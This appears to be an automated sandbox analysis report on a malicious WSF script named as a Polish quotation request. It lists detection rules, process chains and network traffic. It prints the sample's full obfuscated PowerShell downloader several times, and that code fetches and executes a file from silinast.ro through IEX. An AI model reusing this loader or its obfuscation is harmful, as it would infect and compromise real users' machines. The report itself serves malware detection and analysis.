Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrknS rchiepEDampskic roniseuSidereaRPineryaIVrist utr pu
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf", ProcessId: 7312, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrknS rchiepEDampskic roniseuSidereaRPineryaIVrist utr pu

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for domain / URL
              Source: silinast.roVirustotal: Detection: 10%Perma Link
              Source: http://silinast.roVirustotal: Detection: 10%Perma Link
              Source: http://silinast.ro/Kommunikuternes.infVirustotal: Detection: 9%Perma Link
              Multi AV Scanner detection for submitted file
              Source: Prosba o oferte.wsfVirustotal: Detection: 8%Perma Link
              Source: Prosba o oferte.wsfReversingLabs: Detection: 13%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.7% probability
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.2138100600.000002CC9D367000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ion.pdb source: powershell.exe, 00000004.00000002.2136856117.000002CC9D1CD000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: 6777.6777.6777.677e
              Source: global trafficDNS traffic detected: DNS query: silinast.ro
              Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.2103502610.000002CC84C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4214260996.0000000004551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2103502610.000002CC86B70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC86A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC866B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://silinast.ro
              Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://silinast.ro/Kommunikuternes.infP
              Source: powershell.exe, 00000009.00000002.4214260996.00000000046A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://silinast.ro/Kommunikuternes.infXR$lX
              Source: powershell.exe, 00000004.00000002.2103502610.000002CC86B70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://silinast.roXR
              Source: powershell.exe, 00000004.00000002.2103502610.000002CC86A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://silinast.roXh
              Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.2103502610.000002CC84C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000009.00000002.4214260996.0000000004551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.2103502610.000002CC8590B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_7468.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_7936.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7468, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B70C6B64_2_00007FFD9B70C6B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B70D4624_2_00007FFD9B70D462
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B98026A4_2_00007FFD9B98026A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B980A7A4_2_00007FFD9B980A7A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0439F0C09_2_0439F0C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0439F9909_2_0439F990
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0439ED789_2_0439ED78
              Source: Prosba o oferte.wsfInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8354
              Source: unknownProcess created: Commandline size = 8354
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8354Jump to behavior
              Source: amsi64_7468.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7936.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7468, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winWSF@11/7@2/1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Selvsikkerhedens.PanJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jpe3iyr.xo4.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7468
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7936
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Prosba o oferte.wsfVirustotal: Detection: 8%
              Source: Prosba o oferte.wsfReversingLabs: Detection: 13%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur 